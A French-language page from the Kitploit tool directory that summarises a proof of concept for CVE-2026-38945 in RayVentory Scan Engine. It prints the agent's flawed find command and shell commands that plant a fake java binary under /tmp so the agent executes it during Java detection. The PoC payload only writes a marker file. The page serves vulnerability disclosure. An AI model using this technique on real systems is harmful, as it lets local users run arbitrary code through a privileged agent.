Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-38945 — Preuve de concept pour CVE-2026-38945 : le contournement de chemin dans la détection Java de RayVentory Scan Engine permet à des attaquants locaux d'exécuter des binaires arbitraires via des structures de répertoires conçues. | Kitploit
Outils/GitHubGitHub/wise-security/cve-2026-38945
Analyse des VulnérabilitésExploitationTests d'IntrusionSécurité de la Chaîne LogistiqueApprentissage et ÉducationExploitation de Binaires
GitHubwise-security/cve-2026-38945

CVE-2026-38945

Preuve de concept pour CVE-2026-38945 : le contournement de chemin dans la détection Java de RayVentory Scan Engine permet à des attaquants locaux d'exécuter des binaires arbitraires via des structures de répertoires conçues.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 3 moisPas encore vérifié

CVE-2026-38945

  • auteur : Rafael José Núñez Gulías
  • entreprise : Iberian Var Group
  • Produits concernés : RayVentory Scan Engine 12.6 Update 8 et versions antérieures
  • Avis de Raynet : RSEC200967

rvia dans Raynet exécute une commande find avec des critères de recherche mal terminés pour localiser les installations Java lorsque l'option oracle est invoquée. Les attaquants pourraient créer des structures de répertoires spécifiques qui satisfont les critères de recherche mal formés, amenant l'agent à exécuter un binaire malveillant lors du processus de détection Java.

stringsfindcommand.png

root@kitploit:~
/bin/sh -c "find / -not \( -path '/dev' -o -path '/etc' -o -path '/mnt' -o -path '/tmp' -o -path '/proc' \) \( -path '*/jdk/bin/java' -o -path '*/jdk/jre/bin/java' -o -path '*/jdk-*/bin/java' -o -path '*/jdk*/bin/java' -o -path '*/jdk*/jre/bin/java' \) \( -type f -o -type l \)"

Cette commande devrait ignorer les binaires Java dans /tmp (ainsi que dans /dev, /etc, /mnt et /proc, mais nous nous intéressons à l'exemple avec /tmp car il est accessible en écriture à tous).

Notez que l'exclusion d'autres répertoires potentiellement dangereux comme /home est absente.

Le problème vient du fait que la première partie de la commande, destinée à ignorer certains répertoires, ne comporte pas le caractère * à la fin de ces répertoires, alors que le caractère * est utilisé au début des autres répertoires à rechercher.

Cela permet à tout utilisateur de modifier le fichier Java exécuté durant le processus de détection Java, car l'option oracle est souvent lancée via une tâche cron.

root@kitploit:~
mkdir -p /tmp/jdk/bin
echo 'echo "rvia oracle was executed!" > /tmp/PoC' > /tmp/jdk/bin/java && chmod +rx /tmp/jdk/bin/java

executionflow.png

Cela est dû au fait qu'avec l'option oracle, « si le chemin d'exécution Java n'est pas configuré dans le fichier /opt/rvia/rvia.cfg, RayVentory Scan Engine essaie de le trouver quand même chaque fois qu'il en a besoin ». Et à un moment donné, il tente d'obtenir la version de l'environnement Java installé en exécutant java -version.

Télécharger l’outil